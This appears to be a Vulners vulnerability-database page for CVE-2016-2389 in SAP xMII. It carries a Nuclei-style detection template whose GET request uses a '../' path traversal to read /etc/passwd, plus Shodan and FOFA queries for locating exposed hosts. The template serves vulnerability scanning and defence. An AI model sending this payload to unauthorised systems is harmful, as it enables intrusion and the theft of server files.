Vulners
Lucene search
SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | SAP xMII 15.0 - Directory Traversal | 17 May 201600:00 | – | zdt |
 | The vulnerability of the SAP NetWeaver software integration platform, which allows a hacker to read arbitrary files. | 17 Mar 201600:00 | – | bdu_fstec |
 | CVE-2016-2389 | 8 Jul 202521:02 | – | circl |
 | SAP NetWeaver Manufacturing Integration and Intelligence Catalog Traversal Vulnerability | 18 Feb 201600:00 | – | cnvd |
 | CVE-2016-2389 | 16 Feb 201615:00 | – | cve |
 | CVE-2016-2389 | 16 Feb 201615:00 | – | cvelist |
 | SAP xMII 15.0 - Directory Traversal | 17 May 201600:00 | – | exploitdb |
 | SAP xMII - directory traversal vulnerability | 29 Jul 201500:00 | – | erpscan |
 | SAP xMII 15.0 - Directory Traversal | 17 May 201600:00 | – | exploitpack |
 | CVE-2016-2389 | 16 Feb 201615:59 | – | nvd |
10
id: CVE-2016-2389
info:
name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
author: daffainfo
severity: high
description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: |
Apply the latest security patches and updates provided by SAP to mitigate the vulnerability.
reference:
- https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
- https://www.exploit-db.com/exploits/39837/
- https://nvd.nist.gov/vuln/detail/CVE-2016-2389
- http://seclists.org/fulldisclosure/2016/May/40
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-2389
cwe-id: CWE-22
epss-score: 0.83678
epss-percentile: 0.99308
cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: netweaver
shodan-query:
- http.favicon.hash:-266008933
- cpe:"cpe:2.3:a:sap:netweaver"
fofa-query: icon_hash=-266008933
tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100c31caebe3b1409db1c3ecfd9faf1a567d3e3fc2f431baabba1a81933ec3320bd02205c92c4ae4a36a1deea4aa19b1ef75fb9b721a89091b72cdfeda4c141a95583e1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 37.5
CVSS 27.8
EPSS0.83678